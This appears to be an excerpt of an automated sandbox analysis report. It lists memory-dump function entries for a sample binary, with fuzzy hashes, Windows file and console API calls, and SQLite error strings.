                                                                • Instruction Fuzzy Hash: 57D1A172A082119BD704EF25E8C8B2A77B8FF452B5F40062AF905D7211EB39E554CFA3
                                                                APIs
                                                                • GetConsoleOutputCP.KERNEL32 ref: 1D926858
                                                                • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 1D926AAA
                                                                • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 1D926AF0
                                                                • GetLastError.KERNEL32 ref: 1D926B93
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID: FileWrite$ConsoleErrorLastOutput
                                                                • String ID:
                                                                • API String ID: 2718003287-0
                                                                • Opcode ID: e95633e8daa075ca40c0c8a6868f857b1394fc1a0a0cc8bedd0cf5ee015c64e1
                                                                • Instruction ID: cae74976942dba6f4891bee77404b12c988502fa3d323eb6acc8729e84b97b74
                                                                • Opcode Fuzzy Hash: e95633e8daa075ca40c0c8a6868f857b1394fc1a0a0cc8bedd0cf5ee015c64e1
                                                                • Instruction Fuzzy Hash: DCD18875D09258AFCB06CFE8C880AEDBBB8FF09310F14816EE516EB655D630A901CF91
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 0da661e6de83288d497302257255787b81ba9148b9c6ccc592db9186878f442a
                                                                • Instruction ID: 36f8b25af19fa55090443c2729911f4c4b081772ea0b40a3520d3833dc3bd815
                                                                • Opcode Fuzzy Hash: 0da661e6de83288d497302257255787b81ba9148b9c6ccc592db9186878f442a
                                                                • Instruction Fuzzy Hash: E45149356087835ED7518F75A8497AAFFE59F01330F0946AAE9C8CB242E369D588C363
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 0f5a27926bda2cb2567e3f7f1f63ef3a09ce722769f08a76342fa548822d8017
                                                                • Instruction ID: 8551149d6f64f42c9f88df81b5cadc514515cca59c4309b5905b5f51c6a0c04b
                                                                • Opcode Fuzzy Hash: 0f5a27926bda2cb2567e3f7f1f63ef3a09ce722769f08a76342fa548822d8017
                                                                • Instruction Fuzzy Hash: EC41BE766007019FD714CF18E980A62F7E1FF84334F15856EEA4687A62D772F862CB92
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 9910df2373fd2db390fb74b71e9a257a06816967b4ee83915849b198fbc91485
                                                                • Instruction ID: 47314f135b8dd66b2cbeec0beab65ea63e6216bf0efa7ce833dab71428c20b17
                                                                • Opcode Fuzzy Hash: 9910df2373fd2db390fb74b71e9a257a06816967b4ee83915849b198fbc91485
                                                                • Instruction Fuzzy Hash: 5A3172B6A043419BDB14DF68E844B66B3E4FF84322F040A7FE949C7661E321E954D7A3
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 2c84fadece956eb82bcd06ee462d33b28814fba88082786c6e23e5494ba88420
                                                                • Instruction ID: 1ec3d582bc7e4b6327576fab199a34a922dcf72fa4b9de2e0295f308b7c98307
                                                                • Opcode Fuzzy Hash: 2c84fadece956eb82bcd06ee462d33b28814fba88082786c6e23e5494ba88420
                                                                • Instruction Fuzzy Hash: 9E31A175508B419FD320CB25E8447BAB7E0BF85334F04892ED8AA82911D771F488CBA3
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 67f155ee4936aae19aec06cb809ffc92085dd37a0bce870209c165f40ac7d322
                                                                • Instruction ID: 3a26027cdec77510f7639ebe9017dffa39cd1a01eec7c12e6f06406baf37bc7c
                                                                • Opcode Fuzzy Hash: 67f155ee4936aae19aec06cb809ffc92085dd37a0bce870209c165f40ac7d322
                                                                • Instruction Fuzzy Hash: A121B6755047069FD750EF6CD884A5ABBF0EF94350F90482DF585C3222E731E5588B92
                                                                APIs
                                                                • SetFilePointerEx.KERNEL32(00000000,00000000,00000000,?,00000001), ref: 1D92F4E0
                                                                • GetLastError.KERNEL32(?,?,?,?), ref: 1D92F4ED
                                                                • SetFilePointerEx.KERNEL32(?,?,?,?,?), ref: 1D92F513
                                                                • SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000), ref: 1D92F539
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID: FilePointer$ErrorLast
                                                                • String ID:
                                                                • API String ID: 142388799-0
                                                                • Opcode ID: 4fa621a5acb3869c5dcd3ec986f9a0a95653d6ce99f2efc1e43eb0eaac12dd61
                                                                • Instruction ID: 091eef1715f6376e090faa065f319a99a81d6ecb2f1d4aa92a07392cbc860659
                                                                • Opcode Fuzzy Hash: 4fa621a5acb3869c5dcd3ec986f9a0a95653d6ce99f2efc1e43eb0eaac12dd61
                                                                • Instruction Fuzzy Hash: 5C115A72908129BBDF028F95CC48EEF3F7DEF01760F504248F928921A0D7719640CBA1
                                                                APIs
                                                                • WriteConsoleW.KERNEL32 ref: 1D931382
                                                                • GetLastError.KERNEL32 ref: 1D93138E
                                                                • ___initconout.LIBCMT ref: 1D93139E
                                                                  • Part of subcall function 1D931303: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000), ref: 1D931316
                                                                • WriteConsoleW.KERNEL32 ref: 1D9313B3
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID: ConsoleWrite$CreateErrorFileLast___initconout
                                                                • String ID:
                                                                • API String ID: 3431868840-0
                                                                • Opcode ID: eb818d588504810ad6418e7e6d8bf2542e2f75438091ee7469b8548dc1041772
                                                                • Instruction ID: 4135bcc3f708ae2bfc1b143a3d2d5c8fda4db8b2ebaa9adb7fe099e06bdf9489
                                                                • Opcode Fuzzy Hash: eb818d588504810ad6418e7e6d8bf2542e2f75438091ee7469b8548dc1041772
                                                                • Instruction Fuzzy Hash: 5AF0A736008535BBCF171FE5CC44A8E3F75FB092E2F058214FA1C95130CA3288609F85
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: string or blob too big
                                                                • API String ID: 0-2803948771
                                                                • Opcode ID: 45656162d4a5d925a1615356c085ce5da77079d689b770f5ba569aaf540d9f56
                                                                • Instruction ID: 4f0ae95a34ace9d16399c4ce0d0681d96c6cbb1742f4d77165f60a1c1c251f63
                                                                • Opcode Fuzzy Hash: 45656162d4a5d925a1615356c085ce5da77079d689b770f5ba569aaf540d9f56
                                                                • Instruction Fuzzy Hash: EBA129B55087868FD7068E288C40736B7E1AF89230F758B5EF9A5473F2E770D4858A83
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: %!.15g$-
                                                                • API String ID: 0-583212262
                                                                • Opcode ID: 5bd92987489ee5736d14eaaa9cdc9ec9b3e893998c8fff58669e41247ff344f5
                                                                • Instruction ID: 681d829c9cee25442e0c44fa2aca9261ddd8988bd74141fcb226535a3fe1b0f4
                                                                • Opcode Fuzzy Hash: 5bd92987489ee5736d14eaaa9cdc9ec9b3e893998c8fff58669e41247ff344f5
                                                                • Instruction Fuzzy Hash: 03917B71A083468FD704DF6CD89175AFBE0ABC8314F48492DE989CB351E7B9D9098B92
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: string or blob too big
                                                                • API String ID: 0-2803948771
                                                                • Opcode ID: 21625147761cbaaa10963df0b874229035676f66834e07abc2467c68e91f42a4
                                                                • Instruction ID: c4057cfb1592bb1fdd4f2d3243555ee89c8916c8629362d905bf6bdf5d7e9e5a
                                                                • Opcode Fuzzy Hash: 21625147761cbaaa10963df0b874229035676f66834e07abc2467c68e91f42a4
                                                                • Instruction Fuzzy Hash: 6D811175A083018FCB04CE19D889B6AB7E5BFC8334F154D5AFA85972A2E371E9448793
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: *$?
                                                                • API String ID: 0-2367018687
                                                                • Opcode ID: e023c6158235a33aa884ffb4d52706b475d321342de70e414f553fd9cd2e00aa
                                                                • Instruction ID: aaace0f8eccbf8ec0eda58f0dd2a83a557f8c3c88af88fd68f625747be0a66f7
                                                                • Opcode Fuzzy Hash: e023c6158235a33aa884ffb4d52706b475d321342de70e414f553fd9cd2e00aa
                                                                • Instruction Fuzzy Hash: 4771F770A083518FDB129F28CC8072BBBE6EF86610F54896DF9C987311D776D9458BA3
                                                                Strings
                                                                • ESCAPE expression must be a single character, xrefs: 1D74CA43
                                                                • LIKE or GLOB pattern too complex, xrefs: 1D74C94F
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: ESCAPE expression must be a single character$LIKE or GLOB pattern too complex
                                                                • API String ID: 0-264706735
                                                                • Opcode ID: 97a4a89fe51c61db4582ff52ff5fcc0437b3e96a574f545f35036b90c6718503
                                                                • Instruction ID: ecd1b084367d4a69032a6d4c635d2cb25523e30f5b80a420fbe0ca2d2e5b566d
                                                                • Opcode Fuzzy Hash: 97a4a89fe51c61db4582ff52ff5fcc0437b3e96a574f545f35036b90c6718503
                                                                • Instruction Fuzzy Hash: FD618831B09291AFDB0BCA14C881B7677D5AB41334F34C28AE4965B2E7D736D485C353
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: string or blob too big
                                                                • API String ID: 0-2803948771
                                                                • Opcode ID: 7955c80af7c585ebec609d2b8c2e6be45bfd8004617ffa75c505bbdd9fd13e42
                                                                • Instruction ID: 8a25dc958d4e4fddd3d108d303f69f4cc390f109c7018576b1fe2e92e6929379
                                                                • Opcode Fuzzy Hash: 7955c80af7c585ebec609d2b8c2e6be45bfd8004617ffa75c505bbdd9fd13e42
                                                                • Instruction Fuzzy Hash: 07416E728083428FD7125A2C9C457AA7B95AF51330F26893DEDE5533E3E726E648C393
                                                                Strings
                                                                • winDelete, xrefs: 1D74569C
                                                                • delayed %dms for lock/sharing conflict at line %d, xrefs: 1D7456D1
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
